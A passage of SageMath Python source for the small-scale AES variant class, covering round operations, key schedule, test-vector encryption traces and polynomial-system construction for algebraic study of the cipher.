sage: sr = mq.SR(10, 4, 4, 4)
sage: E = sr.state_array() + 1; E
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
::
sage: sr.mix_columns(E)
[ a a + 1 1 1]
[ 1 a a + 1 1]
[ 1 1 a a + 1]
[a + 1 1 1 a]
"""
d = self.state_array(d)
k = self.base_ring()
a = k.gen()
r = self._r
if r == 1:
M = Matrix(self.base_ring(), 1, 1, [[1]])
elif r == 2:
M = Matrix(self.base_ring(), 2, 2, [[a + 1, a],
[a, a + 1]])
elif r == 4:
M = Matrix(self.base_ring(), 4, 4, [[a, a+1, 1, 1],
[1, a, a+1, 1],
[1, 1, a, a+1],
[a+1, 1, 1, a]])
ret =[]
for column in d.columns():
ret.append(M * column)
# AES uses the column major ordering
return Matrix(k, d.ncols(), d.nrows(), ret).transpose()
def add_round_key(self, d, key):
r"""
Perform the ``AddRoundKey`` operation on
``d`` using ``key``.
INPUT:
- ``d`` - state array or something coercible to a
state array
- ``key`` - state array or something coercible to a
state array
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 4)
sage: D = sr.random_state_array()
sage: K = sr.random_state_array()
sage: sr.add_round_key(D, K) == K + D
True
"""
d = self.state_array(d)
key = self.state_array(key)
return d+key
def state_array(self, d=None):
"""
Convert the parameter to a state array.
INPUT:
- ``d`` - a matrix, a list, or a tuple (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: e1 = [k.fetch_int(e) for e in range(2*2)]; e1
[0, 1, a, a + 1]
sage: e2 = sr.phi( Matrix(k, 2*2, 1, e1) )
sage: sr.state_array(e1) # note the column major ordering
[ 0 a]
[ 1 a + 1]
sage: sr.state_array(e2)
[ 0 a]
[ 1 a + 1]
::
sage: sr.state_array()
[0 0]
[0 0]
"""
r = self.r
c = self.c
e = self.e
k = self.base_ring()
if d is None:
return Matrix(k, r, c)
if is_Matrix(d):
if d.nrows() == r*c*e:
return Matrix(k, c, r, self.antiphi(d).list()).transpose()
elif d.ncols() == c and d.nrows() == r and d.base_ring() == k:
return d
if isinstance(d, tuple([list, tuple])):
return Matrix(k, c, r, d).transpose()
def is_state_array(self, d):
"""
Return ``True`` if ``d`` is a state array, i.e. has the correct
dimensions and base field.
EXAMPLES::
sage: sr = mq.SR(2, 2, 4, 8)
sage: k = sr.base_ring()
sage: sr.is_state_array( matrix(k, 2, 4) )
True
::
sage: sr = mq.SR(2, 2, 4, 8)
sage: k = sr.base_ring()
sage: sr.is_state_array( matrix(k, 4, 4) )
False
"""
return is_Matrix(d) and \
d.nrows() == self.r and \
d.ncols() == self.c and \
d.base_ring() == self.base_ring()
def random_state_array(self, *args, **kwds):
r"""
Return a random element in ``MatrixSpace(self.base_ring(),
self.r, self.c)``.
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: sr.random_state_array()
[ a^2 a^3 + a + 1]
[a^3 + a^2 + a + 1 a + 1]
"""
return random_matrix(self.base_ring(), self._r, self._c, *args, **kwds)
def random_vector(self, *args, **kwds):
"""
Return a random vector as it might appear in the algebraic
expression of self.
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: sr.random_vector()
[ a^2]
[ a + 1]
[ a^2 + 1]
[ a]
[a^3 + a^2 + a + 1]
[ a^3 + a]
[ a^3]
[ a^3 + a^2]
[ a^3 + a + 1]
[ a^3 + 1]
[ a^3 + a^2 + 1]
[ a^3 + a^2 + a]
[ a + 1]
[ a^2 + 1]
[ a]
[ a^2]
.. note::
`\phi` was already applied to the result.
"""
return self.vector(self.random_state_array(*args, **kwds))
def random_element(self, elem_type = "vector", *args, **kwds):
"""
Return a random element for self. Other arguments and keywords are
passed to random_* methods.
INPUT:
- ``elem_type`` - either 'vector' or 'state array'
(default: ``'vector'``)
EXAMPLES::
sage: sr = mq.SR()
sage: sr.random_element()
[ a^2]
[ a + 1]
[a^2 + 1]
[ a]
sage: sr.random_element('state_array')
[a^3 + a + 1]
Passes extra positional or keyword arguments through::
sage: sr.random_element(density=0)
[0]
[0]
[0]
[0]
"""
if elem_type == "vector":
return self.random_vector(*args, **kwds)
elif elem_type == "state_array":
return self.random_state_array(*args, **kwds)
else:
raise TypeError("parameter type not understood")
def key_schedule(self, kj, i):
"""
Return `k_i` for a given `i` and `k_j`
with `j = i-1`.
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 8, star=True, allow_zero_inversions=True)
sage: ki = sr.state_array()
sage: for i in range(10):
....: ki = sr.key_schedule(ki, i+1)
sage: print(sr.hex_str_matrix(ki))
B4 3E 23 6F
EF 92 E9 8F
5B E2 51 18
CB 11 CF 8E
"""
if i < 0:
raise TypeError("i must be >= i")
if i == 0:
return kj
r = self.r
c = self.c
F = self.base_ring()
a = F.gen()
SubByte = self.sub_byte
rc = Matrix(F, r, c, ([a**(i-1)] * c) + [F(0)]*((r-1)*c) )
ki = Matrix(F, r, c)
if r == 1:
s0 = SubByte(kj[0, c-1])
if c > 1:
for q in range(c):
ki[0, q] = s0 + sum([kj[0, t] for t in range(q+1) ])
else:
ki[0, 0] = s0
elif r == 2:
s0 = SubByte(kj[1, c-1])
s1 = SubByte(kj[0, c-1])
if c > 1:
for q in range(c):
ki[0, q] = s0 + sum([ kj[0, t] for t in range(q+1) ])
ki[1, q] = s1 + sum([ kj[1, t] for t in range(q+1) ])
else:
ki[0, 0] = s0
ki[1, 0] = s1
elif r == 4:
if self._aes_mode:
s0 = SubByte(kj[1, c-1])
s1 = SubByte(kj[2, c-1])
s2 = SubByte(kj[3, c-1])
s3 = SubByte(kj[0, c-1])
else:
s0 = SubByte(kj[3, c-1])
s1 = SubByte(kj[2, c-1])
s2 = SubByte(kj[1, c-1])
s3 = SubByte(kj[0, c-1])
if c > 1:
for q in range(c):
ki[0, q] = s0 + sum([ kj[0, t] for t in range(q+1) ])
ki[1, q] = s1 + sum([ kj[1, t] for t in range(q+1) ])
ki[2, q] = s2 + sum([ kj[2, t] for t in range(q+1) ])
ki[3, q] = s3 + sum([ kj[3, t] for t in range(q+1) ])
else:
ki[0, 0] = s0
ki[1, 0] = s1
ki[2, 0] = s2
ki[3, 0] = s3
ki += rc
return ki
def __call__(self, P, K):
r"""
Encrypts the plaintext `P` using the key `K`.
Both must be given as state arrays or coercible to state arrays.
INPUT:
- ``P`` - plaintext as state array or something coercible to a
qstate array
- ``K`` - key as state array or something coercible to a state
array
TESTS:
The official AES test vectors::
sage: sr = mq.SR(10, 4, 4, 8, star=True, allow_zero_inversions=True)
sage: k = sr.base_ring()
sage: plaintext = sr.state_array([k.fetch_int(e) for e in range(16)])
sage: key = sr.state_array([k.fetch_int(e) for e in range(16)])
sage: print(sr.hex_str_matrix( sr(plaintext, key) ))
0A 41 F1 C6
94 6E C3 53
0B F0 94 EA
B5 45 58 5A
Brian Gladman's development vectors (dev_vec.txt)::
sage: sr = mq.SR(10, 4, 4, 8, star=True, allow_zero_inversions=True, aes_mode=True)
sage: k = sr.base_ring()
sage: plain = '3243f6a8885a308d313198a2e0370734'
sage: key = '2b7e151628aed2a6abf7158809cf4f3c'
sage: set_verbose(2)
sage: cipher = sr(plain, key)
R[01].start 193DE3BEA0F4E22B9AC68D2AE9F84808
R[01].s_box D42711AEE0BF98F1B8B45DE51E415230
R[01].s_row D4BF5D30E0B452AEB84111F11E2798E5
R[01].m_col 046681E5E0CB199A48F8D37A2806264C
R[01].k_sch A0FAFE1788542CB123A339392A6C7605
R[02].start A49C7FF2689F352B6B5BEA43026A5049
R[02].s_box 49DED28945DB96F17F39871A7702533B
R[02].s_row 49DB873B453953897F02D2F177DE961A
R[02].m_col 584DCAF11B4B5AACDBE7CAA81B6BB0E5
R[02].k_sch F2C295F27A96B9435935807A7359F67F
R[03].start AA8F5F0361DDE3EF82D24AD26832469A
R[03].s_box AC73CF7BEFC111DF13B5D6B545235AB8
R[03].s_row ACC1D6B8EFB55A7B1323CFDF457311B5
R[03].m_col 75EC0993200B633353C0CF7CBB25D0DC
R[03].k_sch 3D80477D4716FE3E1E237E446D7A883B
R[04].start 486C4EEE671D9D0D4DE3B138D65F58E7
R[04].s_box 52502F2885A45ED7E311C807F6CF6A94
R[04].s_row 52A4C89485116A28E3CF2FD7F6505E07
R[04].m_col 0FD6DAA9603138BF6FC0106B5EB31301
R[04].k_sch EF44A541A8525B7FB671253BDB0BAD00
R[05].start E0927FE8C86363C0D9B1355085B8BE01
R[05].s_box E14FD29BE8FBFBBA35C89653976CAE7C
R[05].s_row E1FB967CE8C8AE9B356CD2BA974FFB53
R[05].m_col 25D1A9ADBD11D168B63A338E4C4CC0B0
R[05].k_sch D4D1C6F87C839D87CAF2B8BC11F915BC
R[06].start F1006F55C1924CEF7CC88B325DB5D50C
R[06].s_box A163A8FC784F29DF10E83D234CD503FE
R[06].s_row A14F3DFE78E803FC10D5A8DF4C632923
R[06].m_col 4B868D6D2C4A8980339DF4E837D218D8
R[06].k_sch 6D88A37A110B3EFDDBF98641CA0093FD
R[07].start 260E2E173D41B77DE86472A9FDD28B25
R[07].s_box F7AB31F02783A9FF9B4340D354B53D3F
R[07].s_row F783403F27433DF09BB531FF54ABA9D3
R[07].m_col 1415B5BF461615EC274656D7342AD843
R[07].k_sch 4E54F70E5F5FC9F384A64FB24EA6DC4F
R[08].start 5A4142B11949DC1FA3E019657A8C040C
R[08].s_box BE832CC8D43B86C00AE1D44DDA64F2FE
R[08].s_row BE3BD4FED4E1F2C80A642CC0DA83864D
R[08].m_col 00512FD1B1C889FF54766DCDFA1B99EA
R[08].k_sch EAD27321B58DBAD2312BF5607F8D292F
R[09].start EA835CF00445332D655D98AD8596B0C5
R[09].s_box 87EC4A8CF26EC3D84D4C46959790E7A6
R[09].s_row 876E46A6F24CE78C4D904AD897ECC395
R[09].m_col 473794ED40D4E4A5A3703AA64C9F42BC
R[09].k_sch AC7766F319FADC2128D12941575C006E
R[10].s_box E9098972CB31075F3D327D94AF2E2CB5
R[10].s_row E9317DB5CB322C723D2E895FAF090794
R[10].k_sch D014F9A8C9EE2589E13F0CC8B6630CA6
R[10].output 3925841D02DC09FBDC118597196A0B32
sage: set_verbose(0)
"""
r,c,e = self.r,self.c,self.e
F = self.base_ring()
_type = self.state_array
if isinstance(P, str):
P = self.state_array([F.fetch_int(ZZ(P[i:i+2], 16)) for i in range(0, len(P), 2)])
if isinstance(K, str):
K = self.state_array([F.fetch_int(ZZ(K[i:i+2], 16)) for i in range(0, len(K), 2)])
if self.is_state_array(P) and self.is_state_array(K):
_type = self.state_array
elif self.is_vector(P) and self.is_vector(K):
_type = self.vector
elif isinstance(P, (list,tuple)) and isinstance(K, (list,tuple)):
if len(P) == len(K) == r*c:
_type = self.state_array
elif len(P) == len(K) == r*c*e:
_type = self.vector
else:
raise TypeError("length %d or %d doesn't match either %d or %d"%(len(P),len(K),r*c,r*c*e))
else:
raise TypeError("plaintext or key parameter not understood")
P = self.state_array(P)
K = self.state_array(K)
AddRoundKey = self.add_round_key
SubBytes = self.sub_bytes
MixColumns = self.mix_columns
ShiftRows = self.shift_rows
KeyExpansion = self.key_schedule
P = AddRoundKey(P, K)
for r in range(self._n-1):
if get_verbose() >= 2:
print("R[%02d].start %s"%(r+1, self.hex_str_vector(P)))
P = SubBytes(P)
if get_verbose() >= 2:
print("R[%02d].s_box %s"%(r+1, self.hex_str_vector(P)))
P = ShiftRows(P)
if get_verbose() >= 2:
print("R[%02d].s_row %s"%(r+1, self.hex_str_vector(P)))
P = MixColumns(P)
if get_verbose() >= 2:
print("R[%02d].m_col %s"%(r+1, self.hex_str_vector(P)))
K = KeyExpansion(K, r+1)
if get_verbose() >= 2:
print("R[%02d].k_sch %s"%(r+1, self.hex_str_vector(K)))
P = AddRoundKey(P, K)
P = SubBytes(P)
if get_verbose() >= 2:
print("R[%02d].s_box %s"%(self.n, self.hex_str_vector(P)))
P = ShiftRows(P)
if get_verbose() >= 2:
print("R[%02d].s_row %s"%(self.n, self.hex_str_vector(P)))
if not self._star:
P = MixColumns(P)
if get_verbose() >= 2:
print("R[%02d].m_col %s"%(self.n, self.hex_str_vector(P)))
K = KeyExpansion(K, self._n)
if get_verbose() >= 2:
print("R[%02d].k_sch %s"%(self.n, self.hex_str_vector(K)))
P = AddRoundKey(P, K)
if get_verbose() >= 2:
print("R[%02d].output %s"%(self.n, self.hex_str_vector(P)))
return _type(P)
def hex_str(self, M, typ="matrix"):
r"""
Return a hex string for the provided AES state array/matrix.
INPUT:
- ``M`` - state array
- ``typ`` - controls what to return, either 'matrix'
or 'vector' (default: ``'matrix'``)
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 2, 2, [1, k.gen(), 0, k.gen()^2])
sage: sr.hex_str(A)
' 1 2 \n 0 4 \n'
::
sage: sr.hex_str(A, typ='vector')
'1024'
"""
if typ == "matrix":
return self.hex_str_matrix(M)
elif typ == "vector":
return self.hex_str_vector(M)
else:
raise TypeError("parameter type must either be 'matrix' or 'vector'")
def hex_str_matrix(self, M):
r"""
Return a two-dimensional AES-like representation of the matrix M.
That is, show the finite field elements as hex strings.
INPUT:
- ``M`` - an AES state array
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 2, 2, [1, k.gen(), 0, k.gen()^2])
sage: sr.hex_str_matrix(A)
' 1 2 \n 0 4 \n'
"""
e = M.base_ring().degree()
st = [""]
for x in range(M.nrows()):
for y in range(M.ncols()):
if e == 8:
st.append("%02X" % M[x, y].integer_representation())
else:
st.append("%X" % M[x, y].integer_representation())
st.append("\n")
return " ".join(st)
def hex_str_vector(self, M):
"""
Return a one-dimensional AES-like representation of the matrix M.
That is, show the finite field elements as hex strings.
INPUT:
- ``M`` - an AES state array
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 2, 2, [1, k.gen(), 0, k.gen()^2])
sage: sr.hex_str_vector(A)
'1024'
"""
e = M.base_ring().degree()
st = [""]
for y in range(M.ncols()):
for x in range(M.nrows()):
if e == 8:
st.append("%02X" % M[x, y].integer_representation())
else:
st.append("%X" % M[x, y].integer_representation())
#st.append("\n")
return "".join(st)
def _insert_matrix_into_matrix(self, dst, src, row, col):
"""
Insert matrix src into matrix dst starting at row and col.
INPUT:
- ``dst`` - a matrix
- ``src`` - a matrix
- ``row`` - offset row
- ``col`` - offset columns
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 4)
sage: a = sr.k.gen()
sage: A = sr.state_array() + 1; A
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
sage: B = Matrix(sr.base_ring(), 2, 2, [0, a, a+1, a^2]); B
[ 0 a]
[a + 1 a^2]
sage: sr._insert_matrix_into_matrix(A, B, 1, 1)
[ 1 0 0 0]
[ 0 0 a 0]
[ 0 a + 1 a^2 0]
[ 0 0 0 1]
"""
for i in range(src.nrows()):
for j in range(src.ncols()):
dst[row+i, col+j] = src[i, j]
return dst
def varformatstr(self, name, n=None, rc=None, e=None):
"""
Return a format string which is understood by print et al.
If a numerical value is omitted, the default value of ``self``
is used. The numerical values (``n``, ``rc``, ``e``) are used
to determine the width of the respective fields in the format
string.
INPUT:
- ``name`` - name of the variable
- ``n`` - number of rounds (default: ``None``)
- ``rc`` - number of rows \* number of cols (default: ``None``)
- ``e`` - exponent of base field (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4)
sage: sr.varformatstr('x')
'x%01d%01d%01d'
sage: sr.varformatstr('x', n=1000)
'x%03d%03d%03d'
"""
if n is None:
n = self.n
if rc is None:
rc = self.r * self.c
if e is None:
e = self.e
l = str(max([ len(str(rc-1)), len(str(n-1)), len(str(e-1)) ] ))
if name not in ("k", "s"):
pf = self._postfix
else:
pf = ""
format_string = name + pf + "%0" + l + "d" + "%0" + l + "d" + "%0" + l + "d"
return format_string
def varstr(self, name, nr, rc, e):
"""
Return a string representing a variable for the small scale
AES subject to the given constraints.
INPUT:
- ``name`` - variable name
- ``nr`` - number of round to create variable strings for
- ``rc`` - row*column index in state array
- ``e`` - exponent of base field
EXAMPLES::
sage: sr = mq.SR(10, 1, 2, 4)
sage: sr.varstr('x', 2, 1, 1)
'x211'
"""
format_string = self.varformatstr(name, self.n, self.r*self.c, self.e)
return format_string % (nr, rc, e)
def varstrs(self, name, nr, rc = None, e = None):
"""
Return a list of strings representing variables in ``self``.
INPUT:
- ``name`` - variable name
- ``nr`` - number of round to create variable strings for
- ``rc`` - number of rows * number of columns in the state array (default: ``None``)
- ``e`` - exponent of base field (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(10, 1, 2, 4)
sage: sr.varstrs('x', 2)
('x200', 'x201', 'x202', 'x203', 'x210', 'x211', 'x212', 'x213')
"""
if rc is None:
rc = self.r * self.c
if e is None:
e = self.e
n = self._n
format_string = self.varformatstr(name, n, rc, e)
return tuple([format_string % (nr, rci, ei) for rci in range(rc) for ei in range(e)])
def vars(self, name, nr, rc=None, e=None):
"""
Return a list of variables in ``self``.
INPUT:
- ``name`` - variable name
- ``nr`` - number of round to create variable strings for
- ``rc`` - number of rounds * number of columns in the state array (default: ``None``)
- ``e`` - exponent of base field (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(10, 1, 2, 4)
sage: sr.vars('x', 2)
(x200, x201, x202, x203, x210, x211, x212, x213)
"""
gd = self.variable_dict()
return tuple([gd[e] for e in self.varstrs(name, nr, rc, e)])
def variable_dict(self):
"""
Return a dictionary to access variables in ``self.R`` by their
names.
EXAMPLES::
sage: sr = mq.SR(1,1,1,4)
sage: sr.variable_dict()
{'k000': k000,
'k001': k001,
'k002': k002,
'k003': k003,
'k100': k100,
'k101': k101,
'k102': k102,
'k103': k103,
's000': s000,
's001': s001,
's002': s002,
's003': s003,
'w100': w100,
'w101': w101,
'w102': w102,
'w103': w103,
'x100': x100,
'x101': x101,
'x102': x102,
'x103': x103}
sage: sr = mq.SR(1,1,1,4,gf2=True)
sage: sr.variable_dict()
{'k000': k000,
'k001': k001,
'k002': k002,
'k003': k003,
'k100': k100,
'k101': k101,
'k102': k102,
'k103': k103,
's000': s000,
's001': s001,
's002': s002,
's003': s003,
'w100': w100,
'w101': w101,
'w102': w102,
'w103': w103,
'x100': x100,
'x101': x101,
'x102': x102,
'x103': x103}
"""
try:
R,gd = self._variable_dict
if R is self.R:
return gd
else:
pass
except AttributeError:
pass
gd = self.R.gens_dict()
self._variable_dict = self.R,gd
return gd
def block_order(self):
"""
Return a block order for self where each round is a block.
EXAMPLES::
sage: sr = mq.SR(2, 1, 1, 4)
sage: sr.block_order()
Block term order with blocks:
(Degree lexicographic term order of length 16,
Degree lexicographic term order of length 16,
Degree lexicographic term order of length 4)
::
sage: P = sr.ring(order='block')
sage: print(P.repr_long())
Polynomial Ring
Base Ring : Finite Field in a of size 2^4
Size : 36 Variables
Block 0 : Ordering : deglex
Names : k200, k201, k202, k203, x200, x201, x202, x203, w200, w201, w202, w203, s100, s101, s102, s103
Block 1 : Ordering : deglex
Names : k100, k101, k102, k103, x100, x101, x102, x103, w100, w101, w102, w103, s000, s001, s002, s003
Block 2 : Ordering : deglex
Names : k000, k001, k002, k003
"""
r = self.r
c = self.c
e = self.e
n = self.n
T = None
for _n in range(n):
T = TermOrder('deglex', r*e + 3*r*c*e ) + T
T += TermOrder('deglex', r*c*e)
return T
def ring(self, order=None, reverse_variables=None):
r"""
Construct a ring as a base ring for the polynomial system.
By default, variables are ordered in the reverse of their natural
ordering, i.e. the reverse of as they appear.
INPUT:
- ``order`` - a monomial ordering (default: ``None``)
- ``reverse_variables`` - reverse rounds of variables (default: ``True``)
The variable assignment is as follows:
- `k_{i,j,l}` - subkey round `i` word `j` conjugate/bit `l`
- `s_{i,j,l}` - subkey inverse round `i` word `j` conjugate/bit `l`
- `w_{i,j,l}` - inversion input round `i` word `j` conjugate/bit `l`
- `x_{i,j,l}` - inversion output round `i` word `j` conjugate/bit `l`
Note that the variables are ordered in column major ordering
in the state array and that the bits are ordered in little
endian ordering.
For example, if `x_{0,1,0}` is a variable over `\GF{2}` for
`r=2` and `c=2` then refers to the *most* significant bit of
the entry in the position (1,0) in the state array matrix.
EXAMPLES::
sage: sr = mq.SR(2, 1, 1, 4)
sage: P = sr.ring(order='block')
sage: print(P.repr_long())
Polynomial Ring
Base Ring : Finite Field in a of size 2^4
Size : 36 Variables
Block 0 : Ordering : deglex
Names : k200, k201, k202, k203, x200, x201, x202, x203, w200, w201, w202, w203, s100, s101, s102, s103
Block 1 : Ordering : deglex
Names : k100, k101, k102, k103, x100, x101, x102, x103, w100, w101, w102, w103, s000, s001, s002, s003
Block 2 : Ordering : deglex
Names : k000, k001, k002, k003
"""
r = self.r
c = self.c
e = self.e
n = self.n
if not self._gf2:
k = self.base_ring()
else:
k = GF(2)
if order is not None:
self._order = order
if self._order == 'block':
self._order = self.block_order()
if reverse_variables is None:
reverse_variables = self._reverse_variables
if reverse_variables:
process = lambda x: reversed(x)
else:
process = lambda x: x
if reverse_variables:
names = []
else:
names = self.varstrs("k", 0, r*c, e)
for _n in process(list(range(n))):
names += self.varstrs("k", _n+1, r*c, e)
names += self.varstrs("x", _n+1, r*c, e)
names += self.varstrs("w", _n+1, r*c, e)
names += self.varstrs("s", _n, r, e)
if reverse_variables:
names += self.varstrs("k", 0, r*c, e)
#from sage.rings.polynomial.pbori import BooleanPolynomialRing
if self._gf2 and self._polybori:
return BooleanPolynomialRing(2*n*r*c*e + (n+1)*r*c*e + n*r*e, names, order=self._order)
else:
return PolynomialRing(k, 2*n*r*c*e + (n+1)*r*c*e + n*r*e, names, order=self._order)
def round_polynomials(self, i, plaintext=None, ciphertext=None):
r"""
Return list of polynomials for a given round `i`.
If ``i == 0`` a plaintext must be provided, if ``i == n`` a
ciphertext must be provided.
INPUT:
- ``i`` - round number
- ``plaintext`` - optional plaintext (mandatory in
first round)
- ``ciphertext`` - optional ciphertext (mandatory in
last round)
OUTPUT: tuple
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: k = sr.base_ring()
sage: p = [k.random_element() for _ in range(sr.r*sr.c)]
sage: sr.round_polynomials(0, plaintext=p)
(w100 + k000 + (a^2 + 1), w101 + k001 + (a), w102 + k002 + (a^2), w103 + k003 + (a + 1))
"""
r = self._r
c = self._c
e = self._e
n = self._n
R = self.R
M = self.M
_vars = self.vars
if i == 0:
w1 = Matrix(R, r*c*e, 1, _vars("w", 1, r*c, e))
k0 = Matrix(R, r*c*e, 1, _vars("k", 0, r*c, e))
if isinstance(plaintext, (tuple, list)) and len(plaintext) == r*c:
plaintext = Matrix(R, r*c*e, 1, self.phi(plaintext))
return tuple((w1 + k0 + plaintext).list())
elif i>0 and i<=n:
if self._star and i == n:
M = self.Mstar
xj = Matrix(R, r*c*e, 1, _vars("x", i, r*c, e))
ki = Matrix(R, r*c*e, 1, _vars("k", i, r*c, e))
rcon = Matrix(R, r*c*e, 1, self.phi([self.sbox_constant()]*r*c))
if i < n:
wj = Matrix(R, r*c*e, 1, _vars("w", i+1, r*c, e))
if i == n:
if isinstance(ciphertext, (tuple, list)) and len(ciphertext) == r*c:
ciphertext = Matrix(R, r*c*e, 1, self.phi(ciphertext))
wj = ciphertext
lin = (wj + ki + M * xj + rcon).list()
wi = Matrix(R, r*c*e, 1, _vars("w", i, r*c, e))
xi = Matrix(R, r*c*e, 1, _vars("x", i, r*c, e))
sbox = []
sbox += self.inversion_polynomials(xi, wi, r*c*e)
sbox += self.field_polynomials("x", i)
sbox += self.field_polynomials("w", i)
return tuple(lin + sbox)
def key_schedule_polynomials(self, i):
"""
Return polynomials for the `i`-th round of the key
schedule.
INPUT:
- ``i`` - round (`0 \leq i \leq n`)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True, polybori=False)
The 0-th subkey is the user provided key, so only conjugacy
relations or field polynomials are added.::
sage: sr.key_schedule_polynomials(0)
(k000^2 + k000, k001^2 + k001, k002^2 + k002, k003^2 + k003)
The 1-th subkey is derived from the user provided key according to
the key schedule which is non-linear.::
sage: sr.key_schedule_polynomials(1)
(k100 + s000 + s002 + s003,
k101 + s000 + s001 + s003 + 1,
k102 + s000 + s001 + s002 + 1,
k103 + s001 + s002 + s003 + 1,
k100^2 + k100, k101^2 + k101, k102^2 + k102, k103^2 + k103,
s000^2 + s000, s001^2 + s001, s002^2 + s002, s003^2 + s003,
s000*k000 + s000*k003 + s001*k002 + s002*k001 + s003*k000,
s000*k000 + s000*k001 + s001*k000 + s001*k003 + s002*k002 + s003*k001,
s000*k001 + s000*k002 + s001*k000 + s001*k001 + s002*k000 + s002*k003 + s003*k002,
s000*k000 + s000*k001 + s000*k003 + s001*k001 + s002*k000 + s002*k002 + s003*k000 + k000,
s000*k002 + s001*k000 + s001*k001 + s001*k003 + s002*k001 + s003*k000 + s003*k002 + k001,
s000*k000 + s000*k001 + s000*k002 + s001*k002 + s002*k000 + s002*k001 + s002*k003 + s003*k001 + k002,
s000*k001 + s001*k000 + s001*k002 + s002*k000 + s003*k001 + s003*k003 + k003,
s000*k000 + s000*k002 + s000*k003 + s001*k000 + s001*k001 + s002*k002 + s003*k000 + s000,
s000*k001 + s000*k003 + s001*k001 + s001*k002 + s002*k000 + s002*k003 + s003*k001 + s001,
s000*k000 + s000*k002 + s001*k000 + s001*k002 + s001*k003 + s002*k000 + s002*k001 + s003*k002 + s002,
s000*k001 + s000*k002 + s001*k000 + s001*k003 + s002*k001 + s003*k003 + s003,
s000*k002 + s001*k001 + s002*k000 + s003*k003 + 1)
"""
R = self.R
r = self.r
e = self.e
c = self.c
k = self.k
a = k.gen()
if i < 0:
raise TypeError("i must by >= 0")
if i == 0:
return tuple(self.field_polynomials("k", i, r*c))
else:
L = self.lin_matrix(r)
ki = Matrix(R, r*c*e, 1, self.vars("k", i , r*c, e))
kj = Matrix(R, r*c*e, 1, self.vars("k", i-1, r*c, e))
si = Matrix(R, r*e, 1, self.vars("s", i-1, r, e))
rc = Matrix(R, r*e, 1, self.phi([a**(i-1)] + [k(0)]*(r-1)) )
d = Matrix(R, r*e, 1, self.phi([self.sbox_constant()]*r) )
sbox = []
sbox += self.field_polynomials("k", i)
sbox += self.field_polynomials("s", i-1, r)
if r == 1:
sbox += self.inversion_polynomials(kj[(c - 1)*e:(c - 1)*e + e], si[0:e], e)
if r == 2:
sbox += self.inversion_polynomials( kj[(2*c -1)*e : (2*c -1)*e + e] , si[0:1*e], e )
sbox += self.inversion_polynomials( kj[(2*c -2)*e : (2*c -2)*e + e] , si[e:2*e], e )
if r == 4:
if self._aes_mode:
sbox += self.inversion_polynomials( kj[(4*c-3)*e : (4*c-3)*e + e] , si[0*e : 1*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-2)*e : (4*c-2)*e + e] , si[1*e : 2*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-1)*e : (4*c-1)*e + e] , si[2*e : 3*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-4)*e : (4*c-4)*e + e] , si[3*e : 4*e] , e )
else:
sbox += self.inversion_polynomials( kj[(4*c-1)*e : (4*c-1)*e + e] , si[0*e : 1*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-2)*e : (4*c-2)*e + e] , si[1*e : 2*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-3)*e : (4*c-3)*e + e] , si[2*e : 3*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-4)*e : (4*c-4)*e + e] , si[3*e : 4*e] , e )
si = L * si + d + rc
Sum = Matrix(R, r*e, 1)
lin = []
if c > 1:
for q in range(c):
t = list(range(r*e*(q) , r*e*(q+1)))
Sum += kj.matrix_from_rows(t)
lin += (ki.matrix_from_rows(t) + si + Sum).list()
else:
lin += (ki + si).list()
return tuple(lin + sbox)
def polynomial_system(self, P=None, K=None, C=None):
"""
Return a polynomial system for this small scale AES variant for a
given plaintext-key pair.
If neither ``P``, ``K`` nor ``C`` are provided, a random pair
(``P``, ``K``) will be generated. If ``P`` and ``C`` are
provided no ``K`` needs to be provided.
INPUT:
- ``P`` - vector, list, or tuple (default: ``None``)
- ``K`` - vector, list, or tuple (default: ``None``)
- ``C`` - vector, list, or tuple (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True, polybori=True)
sage: P = sr.vector([0, 0, 1, 0])
sage: K = sr.vector([1, 0, 0, 1])
sage: F, s = sr.polynomial_system(P, K)
This returns a polynomial system::
sage: F
Polynomial Sequence with 36 Polynomials in 20 Variables
and a solution::
sage: s # random -- maybe we need a better doctest here?
{k000: 1, k001: 0, k003: 1, k002: 0}
This solution is not the only solution that we can learn from the
Groebner basis of the system.
::
sage: F.groebner_basis()[-3:]
[k000 + 1, k001, k003 + 1]
In particular we have two solutions::
sage: len(F.ideal().variety())
2
In the following example we provide ``C`` explicitly::
sage: C = sr(P,K)
sage: F,s = sr.polynomial_system(P=P, C=C)
sage: F
Polynomial Sequence with 36 Polynomials in 20 Variables
Alternatively, we can use symbols for the ``P`` and
``C``. First, we have to create a polynomial ring::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True, polybori=True)
sage: R = sr.R
sage: vn = sr.varstrs("P",0,1,4) + R.variable_names() + sr.varstrs("C",0,1,4)
sage: R = BooleanPolynomialRing(len(vn),vn)
sage: sr.R = R
Now, we can construct the purely symbolic equation system::
sage: C = sr.vars("C",0); C
(C000, C001, C002, C003)
sage: P = sr.vars("P",0)
sage: F,s = sr.polynomial_system(P=P,C=C)
sage: [(k,v) for k,v in sorted(s.items())] # this can be ignored
[(k003, 1), (k002, 1), (k001, 0), (k000, 1)]
sage: F
